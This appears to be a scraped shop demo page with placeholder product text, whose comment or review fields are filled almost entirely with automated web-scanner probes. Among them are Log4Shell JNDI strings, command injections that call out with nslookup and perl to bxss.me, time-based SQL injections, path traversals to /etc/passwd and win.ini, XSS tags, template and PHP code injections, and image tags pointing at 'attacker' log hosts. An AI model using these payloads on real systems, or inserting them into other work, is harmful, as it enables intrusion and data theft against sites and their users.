$20.00
Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.
Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.
Headphones
$20.00
Small brush
$18.00
Blade
$9.00
Bag
$35.00
Belt
$35.00
mountaintheme –
t-shirt
1 –
555
${j${::-n}di:dns${::-:}//hitrqnvzdzryx05d03${::-.}bxss.me}zzzz –
555
“+response.write(9951320*9907143)+” –
555
-1 OR 2+983-983-1=0+0+0+1 –
555
1 –
|echo arhbmw$()\ dspmbh\nz^xyu||a #’ |echo arhbmw$()\ dspmbh\nz^xyu||a #|” |echo arhbmw$()\ dspmbh\nz^xyu||a #
1 –
`(nslookup hitvavvxuzpwd8f8e2.bxss.me||perl -e “gethostbyname(‘hitvavvxuzpwd8f8e2.bxss.me’)”)`
q17jadUq’ OR 488=(SELECT 488 FROM PG_SLEEP(15))– –
555
1′” –
555
1 –
wCRH0jm9
1 –
-1 OR 2+616-616-1=0+0+0+1
1 –
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
1 –
1 waitfor delay ‘0:0:15’ —
1 –
1sTYELiEO
${j${::-n}di:dns${::-:}//hitfwxspbxzgv3eed6${::-.}bxss.me}zzzz –
555
Gp5GymTE –
555
1 –
../../../../../../../../../../../../../../windows/win.ini
1 –
&(nslookup hitkmviadketie1c50.bxss.me||perl -e “gethostbyname(‘hitkmviadketie1c50.bxss.me’)”)&’\”`0&(nslookup hitkmviadketie1c50.bxss.me||perl -e “gethostbyname(‘hitkmviadketie1c50.bxss.me’)”)&`’
1 –
‘”()
1 –
555
“+”A”.concat(70-3).concat(22*4).concat(113).concat(73).concat(112).concat(65)+(require”socket” Socket.gethostbyname(“hitrq”+”vbhqbjbuffe00.bxss.me.”)[3].to_s)+” –
555
1 –
${@print(md5(31337))}\
1 –
‘”
1 –
-5 OR 873=(SELECT 873 FROM PG_SLEEP(15))–
1 –
555
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z –
555
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/ –
555
1 –
1%2527%2522
1 waitfor delay ‘0:0:15’ — –
555
-5) OR 318=(SELECT 318 FROM PG_SLEEP(15))– –
555
SYq5ObXr’) OR 48=(SELECT 48 FROM PG_SLEEP(15))– –
555
‘+response.write(9916530*9571955)+’ –
555
@@5b6ka –
555
1 –
12345′”\’\”);|]*{
”💡
1 –
1*555
bxss.me –
555
1 –
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
1 –
-1; waitfor delay ‘0:0:15’ —
1 –
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
1 –
-5 OR 123=(SELECT 123 FROM PG_SLEEP(15))–
‘” –
555
19823312 –
555
1}}”}}’}}1%>”%>’%> –
555
Anonim –
555
1N7Z0A[!+!] –
555
9159 –
555
1PL2JJ[!+!] –
555
1 –
555′”()&%9Fja(9828)
1 –
555
1 –
555
1 –
555′”()&%UDvh(9290)
1 –
5559187394
1 –
1 –
<th:t="${acx}#foreach
1 –
1}}”}}’}}1%>”%>’%>
1 –
acx{{98991*97996}}xca
1 –
acx__${98991*97996}__::.x
1 –
acux1564z1z2abcxuca1564
1 –
acx[[${98991*97996}]]xca
1 –
“acxzzzzzzzzbbbccccdddeeexca”.replace(“z”,”o”)
1 –
5554NP4H[!+!]
1 –
555<ScRIpT>UDvh(9425)</sCrIpT>
1 –
555UDvh(9418)
1 –
555″ onerror=alert(9312)>
1 –
555\u003CScRiPt\UDvh(9887)\u003C/sCripT\u003E
1 –
1 –
1 –
1 –
1 –
555}body{acu:Expre/**/SSion(UDvh(9587))}
1 –
555EDSDB[!+!]
1 –
555<img sRc='http://attacker-9446/log.php?
1 –
5559241″();}]9197
1 –
555UDvh(9994)
1 –
555′”()&%LNez(9389)
1 –
555′”()&%faSc(9654)
1 –
5559679518
1 –
acux8483z1z2abcxuca8483
1 –
555′”()&%M4ir(9346)
1 –
5559284087
1 –
acu3673<s1﹥s2ʺs3ʹuca3673
1 –
555faSc(9407)
1 –
555faSc(9549)
1 –
555faSc(9344)
1 –
555faSc(9388)
1 –
555SGHOC[!+!]
1 –
555<ScRIpT>M4ir(9935)</sCrIpT>
1 –
‘”()&%4GA3(9825)
1 –
555<ScRiPt>faSc(9753)</sCripT>
1 –
1 –
1 –
1 –
1 –
555qrQ0o
faSc(9470)
1 –
1 –
5559811″();}]9137
1 –
555faSc(9704)
1 –
555<aYdOtrn<
1 –
%35%35%35%39%36%39%35%22%28%29%3B%7D%5D%39%30%33%39
1phpmkpYO –
555
5r8KCPhb –
555
`(nslookup hitnkrskzucgc80de1.bxss.me||perl -e “gethostbyname(‘hitnkrskzucgc80de1.bxss.me’)”)` –
555
./1 –
555
1 –
555
http://bxss.me/t/fit.txt?.jpg –
555
) –
555
1 –
‘.gethostbyname(lc(‘hittz’.’phmpepgcc7f21.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(109).chr(72).chr(97).chr(90).’
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) –
555
@@b4dR8 –
555
wp-comments-post.php –
555
/xfs.bxss.me –
555
1 –
555′”()&%Nwmk(9172)
1 –
if(now()=sysdate(),sleep(15),0)
(nslookup hitrdwrvmbcsz52823.bxss.me||perl -e “gethostbyname(‘hitrdwrvmbcsz52823.bxss.me’)”) –
555
../1 –
555
1 –
`(nslookup hitraeioiuxwq514bc.bxss.me||perl -e “gethostbyname(‘hitraeioiuxwq514bc.bxss.me’)”)`
1 –
)
C:\WINDOWS\system32\drivers\etc\hosts –
555
1 –
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’ –
555
1 –
wp-comments-post.php
1 –
555*888*883*0
1 –
‘”()&%KGX6(9208)
1*1 –
555
if(now()=sysdate(),sleep(15),0) –
555
1 –
555
-1); waitfor delay ‘0:0:15’ — –
555
riPNTWtl’; waitfor delay ‘0:0:15’ — –
555
-5) OR 339=(SELECT 339 FROM PG_SLEEP(15))– –
555
1 –
f8ZOSxp3′)) OR 647=(SELECT 647 FROM PG_SLEEP(15))–
1 –
1′”
../../../../../../../../../../../../../../windows/win.ini –
555
1 –
echo cuqwno$()\ nvmphk\nz^xyu||a #’ &echo cuqwno$()\ nvmphk\nz^xyu||a #|” &echo cuqwno$()\ nvmphk\nz^xyu||a #
1 –
|(nslookup hitswridrafkp52730.bxss.me||perl -e “gethostbyname(‘hitswridrafkp52730.bxss.me’)”)
1 –
(955-395-5)
‘”() –
555
1 –
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
‘.print(md5(31337)).’ –
555
1 –
o3SuU9Xh’; waitfor delay ‘0:0:15’ —
1 –
-5) OR 143=(SELECT 143 FROM PG_SLEEP(15))–
1 –
gtPm7WCW’) OR 268=(SELECT 268 FROM PG_SLEEP(15))–
1 –
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
HttP://bxss.me/t/xss.html? –
555
1 –
wp-comments-post.php/.
1 –
‘”()&%qNIr(9293)
1 –
555
1′”()&%1uFb(9783) –
555
1′”()&VF(9601) –
555
19883538 –
555
acx{{98991*97996}}xca –
555
“acxzzzzzzzzbbbccccdddeeexca”.replace(“z”,”o”) –
555
acx[[${98991*97996}]]xca –
555
17fVF(9020) –
555
17fVF(9641) –
555
17fVF(9402) –
555
9683 –
555
1<ScRiPt>7fVF(9186)</sCripT> –
555
1}body{acu:Expre/**/SSion(7fVF(9229))} –
555
1EJDSQ[!+!] –
555
19190″();}]9105 –
555
17fVF(9852) –
555
1′”()&%jGk5(9818) –
555
19996772 –
555
acx__${98991*97996}__::.x –
555
acu10730<s1﹥s2ʺs3ʹuca10730 –
555
1jGk5(9425) –
555
1jGk5(9948) –
555
1jGk5(9836) –
555
1jGk5(9604) –
555
9781 –
555
1<ScRiPt>jGk5(9491)</sCripT> –
555
1}body{acu:Expre/**/SSion(jGk5(9027))} –
555
1CSIGK[!+!] –
555
19157″();}]9509 –
555
1jGk5(9332) –
555
1′”()&%pOPg(9017) –
555
19919719 –
555
acu8724<s1﹥s2ʺs3ʹuca8724 –
555
1pOPg(9591) –
555
1pOPg(9359) –
555
1pOPg(9995) –
555
9858 –
555
1<ScRiPt>pOPg(9811)</sCripT> –
555
1′”()&%xLp7(9317) –
555
19313108 –
555
19150″();}]9783 –
555
1pOPg(9598) –
555
1xLp7(9502) –
555
1xLp7(9773) –
555
1xLp7(9226) –
555
9381 –
555
1<ScRiPt>xLp7(9974)</sCripT> –
555
1}body{acu:Expre/**/SSion(xLp7(9362))} –
555
1NPJUA[!+!] –
555
19338″();}]9776 –
555
1xLp7(9595) –
555
1HcNCQItO –
555
“+response.write(9019495*9489649)+” –
555
1 –
“+response.write(9292552*9729235)+”
&(nslookup hitjobsnoncwf802e4.bxss.me||perl -e “gethostbyname(‘hitjobsnoncwf802e4.bxss.me’)”)&’\”`0&(nslookup hitjobsnoncwf802e4.bxss.me||perl -e “gethostbyname(‘hitjobsnoncwf802e4.bxss.me’)”)&`’ –
555
1*578*573*0 –
555
1 –
|echo nxbpfl$()\ qntrgv\nz^xyu||a #’ |echo nxbpfl$()\ qntrgv\nz^xyu||a #|” |echo nxbpfl$()\ qntrgv\nz^xyu||a #
1 –
&(nslookup hitymskljfgyg21419.bxss.me||perl -e “gethostbyname(‘hitymskljfgyg21419.bxss.me’)”)&’\”`0&(nslookup hitymskljfgyg21419.bxss.me||perl -e “gethostbyname(‘hitymskljfgyg21419.bxss.me’)”)&`’
1 –
;(nslookup hitxazaohqyhdfdcbb.bxss.me||perl -e “gethostbyname(‘hitxazaohqyhdfdcbb.bxss.me’)”)|(nslookup hitxazaohqyhdfdcbb.bxss.me||perl -e “gethostbyname(‘hitxazaohqyhdfdcbb.bxss.me’)”)&(nslookup hitxazaohqyhdfdcbb.bxss.me||perl -e “gethostbyname(‘hitxazaohqyhdfdcbb.bxss.me’)”)
1 –
${9999428+10000335}
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg –
555
-1; waitfor delay ‘0:0:15’ — –
555
1 –
1some_inexistent_file_with_long_name.jpg
!(()&&!|*|*| –
555
1 –
!(()&&!|*|*|
-5) OR 692=(SELECT 692 FROM PG_SLEEP(15))– –
555
-1)) OR 462=(SELECT 462 FROM PG_SLEEP(15))– –
555
ebPSP6nl’ OR 701=(SELECT 701 FROM PG_SLEEP(15))– –
555
JFrk9q8L’)) OR 927=(SELECT 927 FROM PG_SLEEP(15))– –
555
1 –
‘.gethostbyname(lc(‘hitph’.’nfxtglus7b5bc.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(120).chr(86).chr(121).chr(84).’
“;print(md5(31337));$a=” –
555
1 –
‘;print(md5(31337));$a=’
1 –
“+”A”.concat(70-3).concat(22*4).concat(100).concat(86).concat(122).concat(88)+(require”socket”
Socket.gethostbyname(“hitfy”+”xmsqukandbd16.bxss.me.”)[3].to_s)+”
wp-comments-post.php/. –
555
1 –
555*276*271*0
1 –
555*841*836*0
1 –
<!–
1 –
-1 OR 2+591-591-1=0+0+0+1
1 –
“+response.write(9357380*9987085)+”
1*884*879*0 –
555
1 –
555
1*397*392*0 –
555
1 –
-1); waitfor delay ‘0:0:15’ —
1 –
jooVNh66′; waitfor delay ‘0:0:15’ —
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z –
555
1 –
-1)) OR 625=(SELECT 625 FROM PG_SLEEP(15))–
1 –
ga1qMFcj’ OR 953=(SELECT 953 FROM PG_SLEEP(15))–
1 –
oWpTiFs1′) OR 209=(SELECT 209 FROM PG_SLEEP(15))–
1 –
pOnTUBbj’)) OR 955=(SELECT 955 FROM PG_SLEEP(15))–
-5 OR 763=(SELECT 763 FROM PG_SLEEP(15))– –
555
1 –
@@QjmBE
-1)) OR 121=(SELECT 121 FROM PG_SLEEP(15))– –
555
oc2UPNxb’ OR 301=(SELECT 301 FROM PG_SLEEP(15))– –
555
../../../../../../../../../../../../../../etc/passwd –
555
`(nslookup hithkwqnjxmmsa68c0.bxss.me||perl -e “gethostbyname(‘hithkwqnjxmmsa68c0.bxss.me’)”)` –
555
@@SCTUU –
555
1 –
./555
1 –
|(nslookup hitvmdvotkqhua958b.bxss.me||perl -e “gethostbyname(‘hitvmdvotkqhua958b.bxss.me’)”)
1 –
555*23*18*0
1 –
^(#$!@#$)(()))******
1 –
555*205*200*0
1 –
555*301*296*0
1 –
-1 OR 3+452-452-1=0+0+0+1
‘;print(md5(31337));$a=’ –
555
${@print(md5(31337))}\ –
555
1 –
‘+’A’.concat(70-3).concat(22*4).concat(105).concat(83).concat(117).concat(75)+(require’socket’
Socket.gethostbyname(‘hitad’+’hdfnwyypb15c6.bxss.me.’)[3].to_s)+’
1 –
‘.print(md5(31337)).’
))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) –
555
1 –
/xfs.bxss.me
1 –
-5 OR 701=(SELECT 701 FROM PG_SLEEP(15))–
‘”()&2y(9417) –
555
1 –
555′”()&%612y(9286)
1 –
5559542713
1 –
acux7956z1z2abcxuca7956
1 –
@@hMwmu
1 –
555612y(9023)
1 –
555612y(9294)
1*654*649*0 –
555
1*195*190*0 –
555
1*502*497*0 –
555
1 –
555\u003CScRiPt\612y(9281)\u003C/sCripT\u003E
1 –
1 –
555VMWOH[!+!]
1 –
555<img sRc='http://attacker-9987/log.php?
1 –
5559916″();}]9521
1 –
555612y(9196)
1 –
555
1 –
555
response.write(9686826*9720433) –
555
1 –
response.write(9722164*9003728)
echo kvuxjo$()\ xqwlvx\nz^xyu||a #’ &echo kvuxjo$()\ xqwlvx\nz^xyu||a #|” &echo kvuxjo$()\ xqwlvx\nz^xyu||a # –
555
(nslookup hitcszpqrzghgc9cb6.bxss.me||perl -e “gethostbyname(‘hitcszpqrzghgc9cb6.bxss.me’)”) –
555
1 –
CFExUXnh
-5) OR 77=(SELECT 77 FROM PG_SLEEP(15))– –
555
1 –
$(nslookup hithjfdrmjkbo53702.bxss.me||perl -e “gethostbyname(‘hithjfdrmjkbo53702.bxss.me’)”)
1 –
`(nslookup hitavouuubzax59fd1.bxss.me||perl -e “gethostbyname(‘hitavouuubzax59fd1.bxss.me’)”)`
1 –
../../../../../../../../../../../../../../../proc/version
1 –
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
1 –
${9999714+9999919}
1some_inexistent_file_with_long_name.jpg –
555
1 –
…………….etc/passwd
1 –
http://bxss.me/t/fit.txt
1 –
../../../../../../../../../../windows/win.ini.jpg
1 –
..\..\..\..\..\..\..\..\windows\win.ini
1 –
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1 –
WEB-INF/web.xml
1 –
555*22*17*0
1 –
555*469*464*0
1 –
555*486*481*0
1 –
555*870*865*0
1 –
-1 OR 3+800-800-1=0+0+0+1
1&n929305=v945631 –
555
^(#$!@#$)(()))****** –
555
‘.gethostbyname(lc(‘hitbd’.’jinfjihfcfd73.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(118).chr(65).chr(117).chr(74).’ –
555
1 –
“.gethostbyname(lc(“hitla”.”hvxmpwdj4989a.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(107).chr(89).chr(117).chr(78).”
1 –
http://bxss.me/t/xss.html?%00
1 –
“;print(md5(31337));$a=”
‘+’A’.concat(70-3).concat(22*4).concat(108).concat(72).concat(119).concat(70)+(require’socket’ Socket.gethostbyname(‘hitlg’+’atigdvaw75717.bxss.me.’)[3].to_s)+’ –
555
1 –
QH3mgDlD’) OR 83=(SELECT 83 FROM PG_SLEEP(15))–
1 –
ibqf6ftp’)) OR 442=(SELECT 442 FROM PG_SLEEP(15))–
1′”()&%uDPh(9784) –
555
19276568 –
555
1 –
@@DQJkX
acu3394<s1﹥s2ʺs3ʹuca3394 –
555
1uDPh(9852) –
555
1uDPh(9203) –
555
1uDPh(9386) –
555
1uDPh(9448) –
555
9861 –
555
1}body{acu:Expre/**/SSion(uDPh(9165))} –
555
1FPWNT[!+!] –
555
19895″();}]9860 –
555
1uDPh(9733) –
555
1 –
‘”()&%uDPh(9519)
1 –
555
1 –
555
1DyyIniYO –
555
1 –
response.write(9767622*9343421)
|(nslookup hitxsjmeogdxe9280a.bxss.me||perl -e “gethostbyname(‘hitxsjmeogdxe9280a.bxss.me’)”) –
555
${9999479+9999498} –
555
1 –
(nslookup hitjyryxkyjfcf39ee.bxss.me||perl -e “gethostbyname(‘hitjyryxkyjfcf39ee.bxss.me’)”)
1*710*705*0 –
555
-1 OR 3+147-147-1=0+0+0+1 –
555
1 –
../…/.././../…/.././../…/.././../…/.././../…/.././../…/.././etc/passwd
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’)); –
555
1 –
/WEB-INF/web.xml
1 –
/../../../../../../../../../../boot.ini
1 –
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1 –
“+”A”.concat(70-3).concat(22*4).concat(99).concat(73).concat(121).concat(71)+(require”socket”
Socket.gethostbyname(“hityx”+”xglrgfit1f12f.bxss.me.”)[3].to_s)+”
8QGB8iL2′)) OR 34=(SELECT 34 FROM PG_SLEEP(15))– –
555
1 –
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1 –
5aMEW2c8
1 –
(909-349-5)
1 –
(725-165-5)
1 –
(689-129-5)
(nslookup hitphczmzaiwp1c37f.bxss.me||perl -e “gethostbyname(‘hitphczmzaiwp1c37f.bxss.me’)”) –
555
|(nslookup hityknxkymynrf66c3.bxss.me||perl -e “gethostbyname(‘hityknxkymynrf66c3.bxss.me’)”) –
555
1 –
echo jhqisw$()\ rmtfta\nz^xyu||a #’ &echo jhqisw$()\ rmtfta\nz^xyu||a #|” &echo jhqisw$()\ rmtfta\nz^xyu||a #
1 –
$(nslookup hitkptykgmofq97c26.bxss.me||perl -e “gethostbyname(‘hitkptykgmofq97c26.bxss.me’)”)
1 –
/../..//../..//../..//../..//../..//etc/passwd.jpg
1&n960874=v952383 –
555
1 –
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1 –
file:///etc/passwd
1 –
C:\WINDOWS\system32\drivers\etc\hosts
rvbiLTbt’ OR 313=(SELECT 313 FROM PG_SLEEP(15))– –
555
1 –
@@haIB2
1 –
“+”A”.concat(70-3).concat(22*4).concat(116).concat(70).concat(114).concat(81)+(require”socket”
Socket.gethostbyname(“hitcf”+”cynqqrik9bb68.bxss.me.”)[3].to_s)+”
1 –
nqKWucxh
1 –
(866-306-5)
1 –
(1382-822-5)
1 –
(1115-555-5)
${j${::-n}di:dns${::-:}//hitoxcslropjna6e76${::-.}bxss.me}zzzz –
555
1 –
${j${::-n}di:dns${::-:}//hitpuxtvagslb526f6${::-.}bxss.me}zzzz
&echo nxmxkr$()\ mrvuho\nz^xyu||a #’ &echo nxmxkr$()\ mrvuho\nz^xyu||a #|” &echo nxmxkr$()\ mrvuho\nz^xyu||a # –
555
1 –
555
1 –
555
-1 OR 2+828-828-1=0+0+0+1 –
555
1 –
../../../../../../../../../../../../../../etc/passwd
1 –
`(nslookup hitcaodxnusnfd719c.bxss.me||perl -e “gethostbyname(‘hitcaodxnusnfd719c.bxss.me’)”)`
1 –
kJ7skjCq’ OR 765=(SELECT 765 FROM PG_SLEEP(15))–
1 –
/etc/passwd
1 –
bxss.me
1 –
‘.gethostbyname(lc(‘hitru’.’zbiagciw63f2f.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(117).chr(73).chr(107).chr(77).’
-5) OR 902=(SELECT 902 FROM PG_SLEEP(15))– –
555
1 –
../…/.././../…/.././../…/.././../…/.././../…/.././../…/.././windows/win.ini
1 –
‘+’A’.concat(70-3).concat(22*4).concat(107).concat(84).concat(122).concat(90)+(require’socket’
Socket.gethostbyname(‘hitkf’+’abtbpzox9b873.bxss.me.’)[3].to_s)+’
@@3fOh0 –
555
1 –
555
1 –
555′”()&%9w5c(9530)
1 –
555*954*949*0
1 –
555*554*549*0
1 –
555*190*185*0
1 –
555*290*285*0
1 –
-1 OR 3+712-712-1=0+0+0+1
1 –
KpU1Za3k’; waitfor delay ‘0:0:15’ —
1 –
-5) OR 560=(SELECT 560 FROM PG_SLEEP(15))–
1 –
-1)) OR 575=(SELECT 575 FROM PG_SLEEP(15))–
1 –
G0CMuTHf’ OR 41=(SELECT 41 FROM PG_SLEEP(15))–
1 –
LQorHK5D’) OR 723=(SELECT 723 FROM PG_SLEEP(15))–
1 –
@@6VjRA
1′”()&%gLes(9765) –
555
19624997 –
555
acu8736<s1﹥s2ʺs3ʹuca8736 –
555
1gLes(9121) –
555
1gLes(9624) –
555
1gLes(9380) –
555
1gLes(9780) –
555
1gLes(9023) –
555
9071 –
555
1\u003CScRiPt\gLes(9985)\u003C/sCripT\u003E –
555
1<ScRiPt>gLes(9667)</sCripT> –
555
1}body{acu:Expre/**/SSion(gLes(9536))} –
555
13LB9T[!+!] –
555
19929″();}]9527 –
555
1gLes(9117) –
555
1′”()&E3(9252) –
555
‘”()&E3(9937) –
555
1′”()&%j49a(9919) –
555
‘”()&%j49a(9102) –
555
19485837 –
555
acu3081<s1﹥s2ʺs3ʹuca3081 –
555
acu1861<s1﹥s2ʺs3ʹuca1861 –
555
1j49a(9351) –
555
1KIFRN[!+!] –
555
1j49a(9530) –
555
1j49a(9915) –
555
1j49a(9021) –
555
1j49a(9435) –
555
9437 –
555
1\u003CScRiPt\j49a(9798)\u003C/sCripT\u003E –
555
1<ScRiPt>j49a(9418)</sCripT> –
555
19795″();}]9059 –
555
1′”()&%nen6(9774) –
555
‘”()&%nen6(9298) –
555
19747061 –
555
acu5239<s1﹥s2ʺs3ʹuca5239 –
555
acu9029<s1﹥s2ʺs3ʹuca9029 –
555
1nen6(9256) –
555
14TZBT[!+!] –
555
1nen6(9959) –
555
1nen6(9584) –
555
1nen6(9322) –
555
1nen6(9752) –
555
9017 –
555
1\u003CScRiPt\nen6(9435)\u003C/sCripT\u003E –
555
1<ScRiPt>nen6(9038)</sCripT> –
555
1}body{acu:Expre/**/SSion(nen6(9348))} –
555
1Cj7gs nen6(9032) –
555
1WKDLQ[!+!] –
555
19407″();}]9553 –
555
1nen6(9168) –
555
1′”()&%Lzwz(9904) –
555
‘”()&%Lzwz(9038) –
555
19351405 –
555
acu5488<s1﹥s2ʺs3ʹuca5488 –
555
acu10780<s1﹥s2ʺs3ʹuca10780 –
555
1Lzwz(9731) –
555
1AO66Y[!+!] –
555
1Lzwz(9695) –
555
1Lzwz(9424) –
555
1Lzwz(9284) –
555
1Lzwz(9369) –
555
9723 –
555
1\u003CScRiPt\Lzwz(9759)\u003C/sCripT\u003E –
555
1<ScRiPt>Lzwz(9474)</sCripT> –
555
1}body{acu:Expre/**/SSion(Lzwz(9482))} –
555
1CwYiH Lzwz(9216) –
555
1WYOWB[!+!] –
555
19125″();}]9961 –
555
1Lzwz(9376) –
555
1′”()&%djTj(9742) –
555
‘”()&%djTj(9370) –
555
19398564 –
555
acu8254<s1﹥s2ʺs3ʹuca8254 –
555
acu2978<s1﹥s2ʺs3ʹuca2978 –
555
1djTj(9011) –
555
15DAXX[!+!] –
555
1djTj(9150) –
555
1djTj(9525) –
555
1djTj(9790) –
555
1djTj(9901) –
555
9479 –
555
1\u003CScRiPt\djTj(9611)\u003C/sCripT\u003E –
555
1<ScRiPt>djTj(9943)</sCripT> –
555
1}body{acu:Expre/**/SSion(djTj(9436))} –
555
1OODVS djTj(9055) –
555
1IJI11[!+!] –
555
19913″();}]9071 –
555
1djTj(9839) –
555
1′”()&%jrZ6(9265) –
555
19786958 –
555
acu5190<s1﹥s2ʺs3ʹuca5190 –
555
1jrZ6(9794) –
555
1jrZ6(9859) –
555
1jrZ6(9190) –
555
9305 –
555
1<ScRiPt>jrZ6(9544)</sCripT> –
555
1}body{acu:Expre/**/SSion(jrZ6(9418))} –
555
1H6ABN[!+!] –
555
19016″();}]9946 –
555
1jrZ6(9300) –
555
1′”()&i8(9609) –
555
19798507 –
555
acu8811<s1﹥s2ʺs3ʹuca8811 –
555
196i8(9514) –
555
196i8(9206) –
555
196i8(9890) –
555
196i8(9596) –
555
1′”()&%LYbo(9070) –
555
19762041 –
555
9641 –
555
1<ScRiPt>96i8(9386)</sCripT> –
555
acu1258<s1﹥s2ʺs3ʹuca1258 –
555
1}body{acu:Expre/**/SSion(96i8(9837))} –
555
1TD13T[!+!] –
555
19916″();}]9486 –
555
1MAFRB[!+!] –
555
1LYbo(9245) –
555
1LYbo(9447) –
555
9896 –
555
1<ScRiPt>LYbo(9864)</sCripT> –
555
1}body{acu:Expre/**/SSion(LYbo(9078))} –
555
1CU5VI[!+!] –
555
19925″();}]9332 –
555
1LYbo(9560) –
555
${j${::-n}di:dns${::-:}//hittkougagefv184c0${::-.}bxss.me}zzzz –
555
1 –
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}//dns.log4j..-29933..78551${::-.}1${::-.}bxss.me}}
`(nslookup hitftgudpttcf34d51.bxss.me||perl -e “gethostbyname(‘hitftgudpttcf34d51.bxss.me’)”)` –
555
1 –
../555
1 –
555
‘.gethostbyname(lc(‘hitas’.’sibuyqcd5a8c2.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(100).chr(83).chr(99).chr(88).’ –
555
ZlgJYMK2′ OR 93=(SELECT 93 FROM PG_SLEEP(15))– –
555
KB6i2wRN’)) OR 820=(SELECT 820 FROM PG_SLEEP(15))– –
555
1 –
${@print(md5(31337))}
1′”()&%yxkw(9091) –
555
1 –
5559192418
1 –
(1105-545-5)
1 –
acu9061<s1﹥s2ʺs3ʹuca9061
1 –
555yxkw(9135)
1 –
555yxkw(9899)
1 –
x5R9hfPe’ OR 268=(SELECT 268 FROM PG_SLEEP(15))–
1 –
555}body{acu:Expre/**/SSion(yxkw(9684))}
1 –
555<img sRc='http://attacker-9020/log.php?
1 –
555
1 –
555